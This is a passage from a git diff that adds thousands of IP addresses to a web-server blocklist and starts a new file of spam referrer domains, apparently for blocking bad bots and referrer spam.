+8.221.142.130 +8.222.128.242 +8.222.130.1 +8.222.132.42 +8.222.133.68 +8.222.135.186 +8.222.136.121 +8.222.139.16 +8.222.140.9 +8.222.143.76 +8.222.147.160 +8.222.148.227 +8.222.148.47 +8.222.150.25 +8.222.154.210 +8.222.156.49 +8.222.157.113 +8.222.157.164 +8.222.158.165 +8.222.159.179 +8.222.160.62 +8.222.161.69 +8.222.162.70 +8.222.163.221 +8.222.163.222 +8.222.163.23 +8.222.165.81 +8.222.166.125 +8.222.166.157 +8.222.169.160 +8.222.169.217 +8.222.170.87 +8.222.171.149 +8.222.173.158 +8.222.175.161 +8.222.175.173 +8.222.175.32 +8.222.175.60 +8.222.176.53 +8.222.179.111 +8.222.179.148 +8.222.179.78 +8.222.181.172 +8.222.181.42 +8.222.182.84 +8.222.183.199 +8.222.186.220 +8.222.187.152 +8.222.189.128 +8.222.192.67 +8.222.193.108 +8.222.200.205 +8.222.201.35 +8.222.204.75 +8.222.216.20 +8.222.234.22 +8.222.238.80 +8.222.238.96 +8.222.241.159 +8.222.249.135 +8.222.255.81 +8.242.175.222 +8.30.189.34 +8.34.77.141 +8.38.119.48 +8.42.227.236 +80.0.36.83 +80.103.63.114 +80.107.50.128 +80.11.139.53 +80.112.141.230 +80.114.104.203 +80.116.159.40 +80.116.64.92 +80.13.113.217 +80.13.153.140 +80.13.26.200 +80.153.242.194 +80.158.31.3 +80.186.144.129 +80.191.247.45 +80.202.234.12 +80.210.36.47 +80.213.65.8 +80.216.157.164 +80.217.102.180 +80.217.109.85 +80.227.147.94 +80.229.18.62 +80.232.244.53 +80.233.77.125 +80.233.77.136 +80.242.208.68 +80.244.41.220 +80.246.84.105 +80.249.13.204 +80.25.154.166 +80.251.218.164 +80.251.219.111 +80.253.31.232 +80.40.124.119 +80.64.170.227 +80.64.30.138 +80.64.30.139 +80.66.197.108 +80.66.75.106 +80.66.75.186 +80.66.75.57 +80.66.76.121 +80.66.76.130 +80.66.76.134 +80.66.77.235 +80.66.83.114 +80.66.83.201 +80.66.83.46 +80.66.83.47 +80.66.83.48 +80.66.83.49 +80.66.89.184 +80.67.167.81 +80.67.172.162 +80.67.50.187 +80.68.7.50 +80.70.78.112 +80.75.212.46 +80.75.212.9 +80.76.51.163 +80.76.51.76 +80.78.25.16 +80.82.70.133 +80.82.77.139 +80.82.77.202 +80.82.77.33 +80.82.78.14 +80.85.241.43 +80.85.84.75 +80.86.183.237 +80.89.193.5 +80.90.187.143 +80.91.164.103 +80.94.92.117 +80.94.92.119 +80.94.92.134 +80.94.92.139 +80.94.92.14 +80.94.93.187 +80.94.93.246 +80.94.95.219 +80.94.95.226 +80.94.95.249 +80.94.95.81 +81.0.248.203 +81.10.17.49 +81.10.26.13 +81.10.5.69 +81.10.88.31 +81.107.66.186 +81.12.30.24 +81.13.62.77 +81.133.106.57 +81.145.49.186 +81.16.11.200 +81.16.170.117 +81.161.238.160 +81.161.238.213 +81.161.238.22 +81.161.238.93 +81.161.238.94 +81.161.238.97 +81.166.142.226 +81.17.19.66 +81.17.25.50 +81.17.94.226 +81.17.99.122 +81.172.196.174 +81.177.136.216 +81.177.136.252 +81.182.253.185 +81.183.51.158 +81.19.135.47 +81.19.137.51 +81.190.48.5 +81.192.44.70 +81.192.46.38 +81.192.46.45 +81.192.46.48 +81.192.46.49 +81.192.52.58 +81.192.87.130 +81.196.11.237 +81.198.106.49 +81.200.28.236 +81.200.31.81 +81.211.72.167 +81.214.220.153 +81.214.55.193 +81.214.57.217 +81.215.218.193 +81.22.205.12 +81.22.51.64 +81.224.147.83 +81.227.132.103 +81.232.72.247 +81.235.12.240 +81.237.179.58 +81.237.231.86 +81.241.81.54 +81.247.108.128 +81.25.57.53 +81.250.173.151 +81.28.163.21 +81.28.167.30 +81.30.215.78 +81.30.218.138 +81.30.220.215 +81.4.213.28 +81.45.92.76 +81.69.23.141 +81.69.23.155 +81.70.156.89 +81.70.166.44 +81.70.167.134 +81.70.205.76 +81.70.252.139 +81.70.27.122 +81.70.40.202 +81.70.40.35 +81.79.14.107 +81.88.196.117 +81.94.69.183 +81.94.69.93 +81.94.81.18 +81.99.108.81 +82.1.156.85 +82.102.147.199 +82.116.35.199 +82.116.40.140 +82.116.45.8 +82.117.116.11 +82.117.65.152 +82.131.249.225 +82.134.30.194 +82.137.193.252 +82.137.223.152 +82.14.206.237 +82.142.13.233 +82.150.160.249 +82.156.123.122 +82.156.123.236 +82.156.149.236 +82.156.169.242 +82.156.177.193 +82.156.178.118 +82.156.184.42 +82.156.239.225 +82.156.78.109 +82.157.137.41 +82.157.173.147 +82.157.181.190 +82.157.190.174 +82.157.193.14 +82.157.208.10 +82.157.22.199 +82.157.22.34 +82.157.238.134 +82.157.24.111 +82.157.247.165 +82.157.52.140 +82.157.63.72 +82.157.80.60 +82.162.59.212 +82.165.198.169 +82.165.63.240 +82.180.146.226 +82.193.109.199 +82.193.121.147 +82.196.3.179 +82.196.9.140 +82.197.69.243 +82.197.71.235 +82.199.197.245 +82.200.154.210 +82.200.161.178 +82.200.65.218 +82.207.41.235 +82.207.8.154 +82.207.8.194 +82.207.8.218 +82.207.9.150 +82.208.23.192 +82.208.65.46 +82.208.71.208 +82.209.229.34 +82.222.254.50 +82.223.46.174 +82.30.253.181 +82.5.144.219 +82.54.164.193 +82.56.2.140 +82.57.78.231 +82.62.26.234 +82.64.186.234 +82.65.118.203 +82.65.142.32 +82.65.175.65 +82.65.183.225 +82.65.192.254 +82.65.43.136 +82.66.127.45 +82.66.191.11 +82.66.206.119 +82.66.49.230 +82.67.7.178 +82.67.88.93 +82.77.181.62 +82.96.151.84 +83.0.58.239 +83.103.186.30 +83.136.176.12 +83.149.30.186 +83.150.218.171 +83.150.218.36 +83.167.19.90 +83.168.69.66 +83.171.110.159 +83.172.0.133 +83.191.167.84 +83.20.171.36 +83.209.18.18 +83.219.139.43 +83.221.205.30 +83.222.190.106 +83.222.190.110 +83.222.190.114 +83.222.190.122 +83.222.190.50 +83.222.190.58 +83.222.190.66 +83.222.190.70 +83.222.190.82 +83.222.190.94 +83.222.191.42 +83.222.191.62 +83.222.191.90 +83.229.123.230 +83.233.182.145 +83.233.30.104 +83.235.184.113 +83.239.171.137 +83.239.84.130 +83.239.88.62 +83.246.248.9 +83.248.191.121 +83.249.230.252 +83.249.93.150 +83.253.90.199 +83.254.229.132 +83.254.254.231 +83.254.254.56 +83.254.255.184 +83.40.49.202 +83.40.49.38 +83.48.103.43 +83.48.14.160 +83.50.160.8 +83.69.121.202 +83.81.217.221 +83.97.73.245 +84.1.29.224 +84.107.253.198 +84.16.224.227 +84.180.240.248 +84.192.81.243 +84.197.125.74 +84.204.2.136 +84.21.69.130 +84.218.26.9 +84.22.143.205 +84.22.146.106 +84.22.147.211 +84.220.125.76 +84.220.232.239 +84.226.72.131 +84.228.166.53 +84.232.113.50 +84.238.92.245 +84.239.16.162 +84.241.26.198 +84.247.134.69 +84.247.143.87 +84.247.172.240 +84.247.173.42 +84.247.176.179 +84.247.191.24 +84.252.157.155 +84.254.8.55 +84.27.73.55 +84.28.132.70 +84.39.250.160 +84.42.28.190 +84.51.26.202 +84.51.31.138 +84.51.53.251 +84.51.60.102 +84.52.103.234 +84.53.211.189 +84.53.218.106 +84.54.115.46 +84.54.64.50 +85.100.41.150 +85.102.229.13 +85.104.106.170 +85.105.156.37 +85.105.215.115 +85.105.58.146 +85.108.55.253 +85.113.34.158 +85.113.41.213 +85.117.241.82 +85.118.0.124 +85.119.122.23 +85.122.150.203 +85.130.61.137 +85.133.233.5 +85.133.236.94 +85.14.9.205 +85.152.2.14 +85.159.164.28 +85.172.12.254 +85.172.80.60 +85.173.163.107 +85.174.139.107 +85.175.217.106 +85.18.236.229 +85.185.64.219 +85.187.218.236 +85.19.195.12 +85.190.254.105 +85.192.161.50 +85.192.56.68 +85.192.61.181 +85.198.9.170 +85.2.186.140 +85.202.13.107 +85.202.235.2 +85.203.164.186 +85.203.21.100 +85.203.21.101 +85.203.21.103 +85.203.21.105 +85.203.21.107 +85.203.21.109 +85.203.21.110 +85.203.21.111 +85.203.21.119 +85.203.21.123 +85.203.21.131 +85.203.21.135 +85.203.21.137 +85.203.21.138 +85.203.21.150 +85.203.21.152 +85.203.21.153 +85.203.21.70 +85.203.21.71 +85.203.21.73 +85.203.21.74 +85.203.21.75 +85.203.21.76 +85.203.21.85 +85.203.21.86 +85.203.21.87 +85.203.21.88 +85.203.21.92 +85.203.21.93 +85.203.21.95 +85.203.21.97 +85.203.21.98 +85.203.21.99 +85.208.108.225 +85.208.253.54 +85.208.96.193 +85.208.96.195 +85.208.96.205 +85.208.96.206 +85.208.96.208 +85.208.96.209 +85.209.11.254 +85.209.11.27 +85.209.11.71 +85.209.11.73 +85.209.11.75 +85.209.11.79 +85.209.11.89 +85.209.11.99 +85.209.44.3 +85.214.78.182 +85.215.179.36 +85.215.191.27 +85.215.243.32 +85.221.19.7 +85.221.48.115 +85.226.209.84 +85.227.187.228 +85.229.251.252 +85.229.85.3 +85.231.123.72 +85.237.44.48 +85.237.57.200 +85.238.98.211 +85.239.33.196 +85.24.145.198 +85.24.208.226 +85.24.208.234 +85.24.208.239 +85.24.208.245 +85.24.208.247 +85.24.208.249 +85.24.243.93 +85.244.96.116 +85.245.107.230 +85.247.2.222 +85.252.10.186 +85.254.169.222 +85.26.131.133 +85.28.47.202 +85.31.47.12 +85.31.47.22 +85.31.47.34 +85.31.47.40 +85.31.47.42 +85.44.145.73 +85.48.125.160 +85.49.23.118 +85.5.89.232 +85.50.194.51 +85.52.100.61 +85.53.175.153 +85.62.67.73 +85.62.71.52 +85.70.45.245 +85.72.62.147 +85.73.123.108 +85.73.22.115 +85.75.54.57 +85.85.196.35 +85.9.102.65 +85.93.237.33 +85.94.113.254 +85.95.166.40 +85.96.186.226 +85.96.199.207 +85.99.110.20 +86.102.114.2 +86.104.244.234 +86.104.38.239 +86.107.187.236 +86.107.7.242 +86.108.13.226 +86.124.36.40 +86.126.139.84 +86.127.255.78 +86.159.88.162 +86.16.118.167 +86.16.175.213 +86.170.177.217 +86.19.77.170 +86.234.107.59 +86.42.246.197 +86.47.45.101 +86.48.7.114 +86.57.152.52 +86.65.168.139 +86.86.148.20 +86.98.17.26 +86.98.173.95 +86.99.9.62 +87.101.135.122 +87.101.77.70 +87.103.126.54 +87.106.199.212 +87.107.138.144 +87.117.32.22 +87.120.112.119 +87.120.112.202 +87.120.112.5 +87.120.112.86 +87.120.113.135 +87.120.113.139 +87.120.113.203 +87.120.113.230 +87.120.113.28 +87.120.113.38 +87.120.114.12 +87.120.114.147 +87.120.115.119 +87.120.115.120 +87.120.115.48 +87.120.116.167 +87.120.116.203 +87.120.116.60 +87.120.116.81 +87.120.117.175 +87.120.117.177 +87.120.117.182 +87.120.117.184 +87.120.117.239 +87.120.117.24 +87.120.117.240 +87.120.117.29 +87.120.125.108 +87.120.125.201 +87.120.126.145 +87.120.126.80 +87.120.131.25 +87.120.166.244 +87.120.166.5 +87.121.78.20 +87.121.86.29 +87.121.86.40 +87.121.86.64 +87.121.86.83 +87.121.86.84 +87.121.86.87 +87.126.166.109 +87.13.175.158 +87.13.204.95 +87.14.70.47 +87.16.117.3 +87.191.58.74 +87.197.128.1 +87.201.127.149 +87.201.164.139 +87.202.162.65 +87.220.64.213 +87.221.49.69 +87.227.13.86 +87.227.66.50 +87.236.176.10 +87.236.176.100 +87.236.176.101 +87.236.176.102 +87.236.176.106 +87.236.176.108 +87.236.176.11 +87.236.176.110 +87.236.176.111 +87.236.176.112 +87.236.176.113 +87.236.176.114 +87.236.176.116 +87.236.176.117 +87.236.176.12 +87.236.176.120 +87.236.176.122 +87.236.176.123 +87.236.176.124 +87.236.176.125 +87.236.176.126 +87.236.176.127 +87.236.176.129 +87.236.176.130 +87.236.176.131 +87.236.176.133 +87.236.176.134 +87.236.176.135 +87.236.176.136 +87.236.176.137 +87.236.176.139 +87.236.176.14 +87.236.176.141 +87.236.176.142 +87.236.176.144 +87.236.176.145 +87.236.176.146 +87.236.176.147 +87.236.176.149 +87.236.176.15 +87.236.176.151 +87.236.176.154 +87.236.176.155 +87.236.176.156 +87.236.176.158 +87.236.176.159 +87.236.176.16 +87.236.176.160 +87.236.176.163 +87.236.176.164 +87.236.176.165 +87.236.176.166 +87.236.176.167 +87.236.176.168 +87.236.176.169 +87.236.176.171 +87.236.176.172 +87.236.176.173 +87.236.176.174 +87.236.176.176 +87.236.176.177 +87.236.176.179 +87.236.176.18 +87.236.176.180 +87.236.176.181 +87.236.176.182 +87.236.176.183 +87.236.176.184 +87.236.176.185 +87.236.176.186 +87.236.176.187 +87.236.176.189 +87.236.176.19 +87.236.176.190 +87.236.176.191 +87.236.176.193 +87.236.176.194 +87.236.176.195 +87.236.176.196 +87.236.176.197 +87.236.176.198 +87.236.176.199 +87.236.176.2 +87.236.176.20 +87.236.176.201 +87.236.176.203 +87.236.176.204 +87.236.176.205 +87.236.176.206 +87.236.176.207 +87.236.176.208 +87.236.176.209 +87.236.176.21 +87.236.176.212 +87.236.176.214 +87.236.176.215 +87.236.176.216 +87.236.176.218 +87.236.176.219 +87.236.176.220 +87.236.176.222 +87.236.176.224 +87.236.176.226 +87.236.176.227 +87.236.176.228 +87.236.176.229 +87.236.176.23 +87.236.176.230 +87.236.176.231 +87.236.176.232 +87.236.176.233 +87.236.176.235 +87.236.176.236 +87.236.176.238 +87.236.176.239 +87.236.176.24 +87.236.176.241 +87.236.176.242 +87.236.176.243 +87.236.176.244 +87.236.176.247 +87.236.176.248 +87.236.176.249 +87.236.176.25 +87.236.176.250 +87.236.176.251 +87.236.176.252 +87.236.176.253 +87.236.176.26 +87.236.176.27 +87.236.176.28 +87.236.176.29 +87.236.176.3 +87.236.176.30 +87.236.176.31 +87.236.176.32 +87.236.176.33 +87.236.176.34 +87.236.176.35 +87.236.176.36 +87.236.176.37 +87.236.176.38 +87.236.176.39 +87.236.176.4 +87.236.176.41 +87.236.176.42 +87.236.176.43 +87.236.176.44 +87.236.176.45 +87.236.176.46 +87.236.176.47 +87.236.176.48 +87.236.176.49 +87.236.176.5 +87.236.176.50 +87.236.176.51 +87.236.176.52 +87.236.176.53 +87.236.176.54 +87.236.176.55 +87.236.176.57 +87.236.176.58 +87.236.176.59 +87.236.176.6 +87.236.176.60 +87.236.176.61 +87.236.176.62 +87.236.176.63 +87.236.176.64 +87.236.176.65 +87.236.176.66 +87.236.176.67 +87.236.176.68 +87.236.176.69 +87.236.176.7 +87.236.176.70 +87.236.176.71 +87.236.176.72 +87.236.176.73 +87.236.176.74 +87.236.176.76 +87.236.176.77 +87.236.176.78 +87.236.176.79 +87.236.176.8 +87.236.176.80 +87.236.176.81 +87.236.176.82 +87.236.176.83 +87.236.176.84 +87.236.176.85 +87.236.176.86 +87.236.176.87 +87.236.176.89 +87.236.176.9 +87.236.176.90 +87.236.176.91 +87.236.176.92 +87.236.176.93 +87.236.176.94 +87.236.176.95 +87.236.176.96 +87.236.176.99 +87.236.233.66 +87.237.197.166 +87.244.184.246 +87.246.166.239 +87.247.158.120 +87.248.1.199 +87.248.226.146 +87.249.18.170 +87.250.219.159 +87.251.102.94 +87.251.67.151 +87.251.75.136 +87.252.103.130 +87.253.68.149 +87.255.193.50 +87.26.178.75 +87.27.208.153 +87.6.252.56 +87.63.95.23 +87.64.189.249 +87.7.103.183 +87.74.41.50 +87.98.134.245 +87.98.173.252 +87.98.243.61 +87.99.79.98 +88.101.27.125 +88.103.187.12 +88.119.251.158 +88.119.92.210 +88.121.9.222 +88.129.112.108 +88.129.112.119 +88.129.112.121 +88.129.112.126 +88.129.112.43 +88.129.112.55 +88.129.112.59 +88.129.112.6 +88.129.112.88 +88.135.157.178 +88.135.73.17 +88.138.114.161 +88.142.46.185 +88.147.148.102 +88.147.30.59 +88.175.186.160 +88.200.205.36 +88.204.148.90 +88.204.204.78 +88.205.172.170 +88.210.24.170 +88.214.25.16 +88.218.181.214 +88.244.72.64 +88.247.119.252 +88.247.125.159 +88.247.149.40 +88.247.151.143 +88.247.176.97 +88.247.49.55 +88.247.90.77 +88.248.95.103 +88.249.203.170 +88.249.206.186 +88.250.31.32 +88.250.75.171 +88.250.96.28 +88.255.236.181 +88.84.222.5 +88.87.36.169 +88.87.88.69 +88.87.92.77 +88.99.91.209 +89.10.212.19 +89.101.238.143 +89.107.10.145 +89.107.10.9 +89.109.1.180 +89.109.41.71 +89.134.229.38 +89.144.208.116 +89.144.212.35 +89.147.102.251 +89.150.35.56 +89.150.40.56 +89.154.72.49 +89.160.118.239 +89.160.245.252 +89.160.6.62 +89.163.148.212 +89.163.152.211 +89.165.1.36 +89.169.52.77 +89.171.112.195 +89.171.139.110 +89.175.169.246 +89.179.33.126 +89.183.192.4 +89.183.192.40 +89.185.85.104 +89.185.85.140 +89.185.85.253 +89.185.85.56 +89.187.162.181 +89.187.162.182 +89.187.162.183 +89.188.76.72 +89.188.76.74 +89.189.148.122 +89.189.154.52 +89.189.159.104 +89.190.156.158 +89.190.156.198 +89.190.156.56 +89.207.218.10 +89.208.104.147 +89.208.97.186 +89.210.83.143 +89.211.188.252 +89.216.47.154 +89.218.185.66 +89.218.96.146 +89.23.13.202 +89.23.212.52 +89.232.73.146 +89.233.105.148 +89.234.157.254 +89.235.116.181 +89.236.112.100 +89.242.233.180 +89.243.158.222 +89.248.163.197 +89.248.163.200 +89.248.167.131 +89.248.168.227 +89.248.172.16 +89.248.172.92 +89.249.246.115 +89.25.116.143 +89.25.208.214 +89.28.252.22 +89.29.128.110 +89.31.187.230 +89.35.14.168 +89.37.95.34 +89.58.26.216 +89.58.41.156 +89.77.160.8 +89.97.218.142 +90.142.41.139 +90.150.180.81 +90.151.171.106 +90.151.171.109 +90.160.139.163 +90.161.217.228 +90.170.254.208 +90.182.200.58 +90.188.239.57 +90.188.251.32 +90.189.153.184 +90.210.4.181 +90.210.83.243 +90.225.32.79 +90.230.155.158 +90.239.30.219 +90.54.151.86 +90.63.170.8 +90.80.64.237 +90.84.176.109 +91.103.110.33 +91.105.81.111 +91.107.176.208 +91.121.2.118 +91.121.6.105 +91.122.59.23 +91.122.61.22 +91.122.62.147 +91.128.186.3 +91.132.146.181 +91.132.254.105 +91.134.183.190 +91.134.243.207 +91.134.248.192 +91.134.248.230 +91.134.248.235 +91.134.248.249 +91.134.248.253 +91.134.90.177 +91.135.108.160 +91.142.222.180 +91.144.158.231 +91.144.162.129 +91.144.20.198 +91.144.21.170 +91.147.101.41 +91.147.205.181 +91.147.93.36 +91.147.93.45 +91.149.0.168 +91.149.242.56 +91.151.128.225 +91.151.88.144 +91.175.44.218 +91.185.237.240 +91.185.50.198 +91.189.183.213 +91.189.233.28 +91.189.74.114 +91.189.77.7 +91.191.209.198 +91.191.209.54 +91.191.209.74 +91.192.44.36 +91.192.62.206 +91.194.11.104 +91.194.11.114 +91.194.11.115 +91.195.205.157 +91.196.123.179 +91.196.54.125 +91.200.102.199 +91.200.34.109 +91.202.145.55 +91.202.207.43 +91.202.233.16 +91.202.233.17 +91.202.233.21 +91.202.233.22 +91.205.104.28 +91.205.128.170 +91.205.219.185 +91.206.200.147 +91.206.201.49 +91.206.26.26 +91.206.32.120 +91.208.75.3 +91.208.75.4 +91.210.59.57 +91.211.56.114 +91.212.166.37 +91.213.99.45 +91.214.82.83 +91.215.136.69 +91.215.63.55 +91.217.60.200 +91.218.102.193 +91.218.86.143 +91.219.165.25 +91.219.236.80 +91.219.237.56 +91.221.246.6 +91.223.169.83 +91.223.169.88 +91.224.97.25 +91.225.163.102 +91.226.43.7 +91.228.51.16 +91.231.233.55 +91.232.29.206 +91.233.158.181 +91.236.168.249 +91.237.122.248 +91.238.171.101 +91.238.181.20 +91.238.181.21 +91.238.181.22 +91.238.181.23 +91.238.181.24 +91.238.181.31 +91.238.181.32 +91.238.181.33 +91.238.181.34 +91.238.181.35 +91.238.181.71 +91.238.90.28 +91.239.19.66 +91.239.19.97 +91.240.211.79 +91.241.176.46 +91.243.50.206 +91.244.170.207 +91.244.171.193 +91.244.63.18 +91.244.73.221 +91.247.99.220 +91.247.99.222 +91.73.195.150 +91.74.98.113 +91.75.14.80 +91.77.163.86 +91.92.103.57 +91.92.109.43 +91.92.120.31 +91.92.199.36 +91.92.250.99 +91.93.140.251 +92.100.38.124 +92.114.59.139 +92.115.238.156 +92.118.152.111 +92.118.39.101 +92.118.39.115 +92.118.39.133 +92.118.39.15 +92.118.39.152 +92.118.39.203 +92.118.39.204 +92.118.39.205 +92.118.39.210 +92.118.39.212 +92.118.39.244 +92.118.39.34 +92.118.39.37 +92.118.39.81 +92.12.89.146 +92.126.239.43 +92.154.59.101 +92.154.95.236 +92.19.236.103 +92.19.255.206 +92.204.139.118 +92.204.144.151 +92.205.108.83 +92.205.176.4 +92.205.182.254 +92.205.185.112 +92.205.19.74 +92.222.10.235 +92.222.108.131 +92.222.171.6 +92.222.181.145 +92.222.181.205 +92.222.50.21 +92.241.104.205 +92.241.7.41 +92.241.98.211 +92.246.139.107 +92.246.84.133 +92.249.48.232 +92.249.48.36 +92.253.239.53 +92.255.161.210 +92.255.185.232 +92.255.194.79 +92.255.195.59 +92.255.196.185 +92.255.225.247 +92.255.229.209 +92.255.239.83 +92.255.247.162 +92.255.248.100 +92.255.85.107 +92.255.85.253 +92.26.0.203 +92.27.101.99 +92.27.157.252 +92.27.247.25 +92.31.0.236 +92.33.220.122 +92.33.249.98 +92.38.42.8 +92.42.96.51 +92.45.175.68 +92.45.223.5 +92.47.133.50 +92.47.46.174 +92.51.2.55 +92.52.136.14 +92.52.146.18 +92.53.96.106 +92.55.190.215 +92.57.183.195 +92.62.131.124 +92.62.243.154 +92.63.197.210 +92.63.206.99 +92.64.100.65 +92.64.144.152 +92.65.107.171 +92.70.87.22 +92.85.153.97 +92.92.43.98 +92.96.153.146 +92.98.150.234 +93.103.8.172 +93.113.111.193 +93.113.237.25 +93.113.63.124 +93.113.63.8 +93.115.79.45 +93.118.142.198 +93.120.240.202 +93.121.129.167 +93.123.109.142 +93.123.194.205 +93.123.243.99 +93.123.251.35 +93.123.39.109 +93.123.39.141 +93.123.39.144 +93.123.39.61 +93.123.39.73 +93.123.39.81 +93.123.39.97 +93.123.41.211 +93.123.85.105 +93.123.85.210 +93.133.208.40 +93.144.1.222 +93.144.144.205 +93.144.181.136 +93.146.1.176 +93.146.158.153 +93.146.34.27 +93.146.34.52 +93.146.80.174 +93.148.188.54 +93.148.70.184 +93.149.138.23 +93.149.172.206 +93.149.217.144 +93.153.142.254 +93.155.249.95 +93.155.255.59 +93.160.174.27 +93.161.57.81 +93.170.38.54 +93.170.45.173 +93.171.209.18 +93.174.93.12 +93.174.95.106 +93.176.164.67 +93.177.126.176 +93.182.160.222 +93.182.160.223 +93.183.131.53 +93.183.216.225 +93.185.73.178 +93.190.138.132 +93.241.247.234 +93.41.226.107 +93.42.211.26 +93.46.179.38 +93.47.150.234 +93.48.136.80 +93.51.37.228 +93.51.72.36 +93.55.193.165 +93.55.243.100 +93.55.244.182 +93.65.104.158 +93.65.122.107 +93.65.80.231 +93.65.87.64 +93.66.159.50 +93.66.242.223 +93.66.33.140 +93.67.149.106 +93.67.199.29 +93.67.93.58 +93.67.94.163 +93.70.108.31 +93.70.115.22 +93.70.15.143 +93.71.161.66 +93.71.163.86 +93.71.218.41 +93.71.62.177 +93.8.245.134 +93.90.41.12 +93.92.87.7 +93.93.115.178 +94.101.54.97 +94.102.125.123 +94.102.15.162 +94.102.49.119 +94.102.49.190 +94.102.49.193 +94.102.49.238 +94.102.51.15 +94.102.63.68 +94.103.125.176 +94.126.58.200 +94.127.212.198 +94.131.211.168 +94.136.187.188 +94.139.165.200 +94.141.102.140 +94.141.120.106 +94.141.120.147 +94.141.120.23 +94.141.120.236 +94.141.120.28 +94.141.120.39 +94.141.120.42 +94.141.120.65 +94.141.69.156 +94.142.138.120 +94.154.172.51 +94.154.225.169 +94.156.104.115 +94.156.104.157 +94.156.104.166 +94.156.104.177 +94.156.104.51 +94.156.104.53 +94.156.104.54 +94.156.104.56 +94.156.104.58 +94.156.104.59 +94.156.104.80 +94.156.104.86 +94.156.104.88 +94.156.104.91 +94.156.105.15 +94.156.105.167 +94.156.167.153 +94.156.167.171 +94.156.167.191 +94.156.167.206 +94.156.167.76 +94.156.167.77 +94.156.167.78 +94.156.167.81 +94.156.167.83 +94.156.167.93 +94.156.177.121 +94.156.177.13 +94.156.177.133 +94.156.177.134 +94.156.177.139 +94.156.177.163 +94.156.177.17 +94.156.177.18 +94.156.177.19 +94.156.177.21 +94.156.177.213 +94.156.177.22 +94.156.177.26 +94.156.177.29 +94.156.177.31 +94.156.177.32 +94.156.177.5 +94.156.177.64 +94.156.177.70 +94.156.177.73 +94.156.177.76 +94.156.177.77 +94.156.177.8 +94.156.177.80 +94.156.214.253 +94.159.113.15 +94.159.113.18 +94.159.59.30 +94.159.93.115 +94.159.93.92 +94.16.121.226 +94.177.106.38 +94.179.107.98 +94.179.109.66 +94.179.133.22 +94.181.0.60 +94.182.108.208 +94.182.136.38 +94.182.171.4 +94.182.197.178 +94.182.207.16 +94.183.183.190 +94.19.176.212 +94.190.231.26 +94.190.231.27 +94.190.231.3 +94.20.233.203 +94.201.96.25 +94.204.192.242 +94.204.253.203 +94.204.255.57 +94.204.45.174 +94.206.41.18 +94.207.16.191 +94.207.25.245 +94.228.162.3 +94.228.163.98 +94.228.169.57 +94.228.169.65 +94.23.123.1 +94.23.61.165 +94.23.68.219 +94.230.119.157 +94.230.136.205 +94.230.208.147 +94.232.247.206 +94.232.40.72 +94.232.42.62 +94.236.163.176 +94.249.69.90 +94.253.15.178 +94.254.0.234 +94.255.3.72 +94.26.251.220 +94.27.213.67 +94.33.59.31 +94.41.0.232 +94.45.209.23 +94.45.56.254 +94.45.76.149 +94.46.220.4 +94.52.209.104 +94.52.39.117 +94.53.116.52 +94.53.155.34 +94.59.144.110 +94.59.191.104 +94.61.7.100 +94.63.229.20 +94.65.205.24 +94.65.79.182 +94.66.127.218 +94.67.32.255 +94.70.116.91 +94.70.152.191 +94.70.201.187 +94.71.154.1 +94.72.115.107 +94.72.52.14 +94.73.233.81 +94.74.194.222 +94.76.197.82 +94.76.82.57 +95.105.113.109 +95.105.113.224 +95.105.89.221 +95.109.161.75 +95.128.69.10 +95.132.239.87 +95.134.127.209 +95.135.175.219 +95.138.243.145 +95.141.228.9 +95.142.121.62 +95.152.58.97 +95.152.60.122 +95.154.85.230 +95.155.36.152 +95.160.28.219 +95.160.47.156 +95.164.10.46 +95.164.65.33 +95.165.135.255 +95.165.153.0 +95.165.240.114 +95.165.29.72 +95.165.65.191 +95.167.225.76 +95.167.53.115 +95.167.53.123 +95.167.53.2 +95.167.53.34 +95.167.53.78 +95.167.53.98 +95.170.188.70 +95.173.191.84 +95.173.2.140 +95.174.104.112 +95.174.99.133 +95.181.128.194 +95.181.86.2 +95.188.146.10 +95.188.64.5 +95.188.65.160 +95.188.91.101 +95.189.99.154 +95.204.92.226 +95.209.130.210 +95.214.27.136 +95.214.27.166 +95.214.27.168 +95.214.27.169 +95.214.27.170 +95.214.27.27 +95.214.27.29 +95.214.27.30 +95.214.27.32 +95.214.27.40 +95.214.27.41 +95.214.55.138 +95.214.55.43 +95.217.109.26 +95.217.170.43 +95.221.134.193 +95.245.15.95 +95.251.122.138 +95.255.108.3 +95.255.135.3 +95.27.217.114 +95.35.26.164 +95.37.231.158 +95.38.106.182 +95.42.60.161 +95.47.149.88 +95.47.253.105 +95.52.220.109 +95.56.227.226 +95.57.104.252 +95.58.255.251 +95.6.69.188 +95.6.90.219 +95.64.136.246 +95.64.190.142 +95.65.98.61 +95.66.156.7 +95.66.159.143 +95.66.218.129 +95.68.246.151 +95.72.200.106 +95.78.118.47 +95.78.39.1 +95.79.108.51 +95.79.188.198 +95.79.34.101 +95.79.46.245 +95.79.50.161 +95.80.183.229 +95.81.93.99 +95.83.127.48 +95.84.137.101 +95.84.148.71 +95.84.217.221 +95.85.112.170 +95.85.47.10 +95.86.164.87 +95.87.248.223 +95.9.245.47 +95.90.242.212 +95.90.54.167 +95.90.93.96 +95.91.237.231 +96.10.249.114 +96.126.106.244 +96.126.126.128 +96.126.127.169 +96.126.98.234 +96.19.196.219 +96.227.113.73 +96.232.248.246 +96.241.201.20 +96.249.218.124 +96.30.227.86 +96.39.16.158 +96.65.96.203 +96.66.198.178 +96.67.216.91 +96.67.59.65 +96.68.197.250 +96.69.13.140 +96.70.176.106 +96.73.137.118 +96.73.251.54 +96.77.104.177 +96.77.117.189 +96.78.175.36 +96.79.174.131 +96.88.153.181 +96.91.134.238 +96.95.218.196 +97.104.82.254 +97.107.133.213 +97.107.139.196 +97.107.140.102 +97.107.141.150 +97.64.20.231 +97.79.181.188 +97.86.134.216 +98.10.121.246 +98.110.18.35 +98.128.142.76 +98.128.173.33 +98.14.144.113 +98.149.234.142 +98.152.200.3 +98.160.53.163 +98.17.18.158 +98.177.3.82 +98.181.106.22 +98.208.201.172 +98.212.82.109 +98.224.6.34 +98.23.233.65 +98.29.202.134 +98.40.187.153 +98.40.228.65 +98.42.204.232 +98.44.49.50 +98.58.130.162 +98.70.78.215 +98.81.0.102 +98.96.193.10 +98.96.193.11 +98.96.193.13 +98.96.193.2 +98.96.193.27 +98.96.193.28 +98.96.193.3 +98.96.193.4 +98.96.193.5 +98.96.193.50 +98.96.193.52 +98.98.57.62 +99.240.113.135 diff --git a/db/bad-referrers.txt b/db/bad-referrers.txt new file mode 100644 index 00000000..75f087ff --- /dev/null +++ b/db/bad-referrers.txt @@ -0,0 +1,7105 @@ +000free.us +007angels.com +00author.com +00go.com +00it.com +00webcams.com +01apple.com +03e.info +03p.info 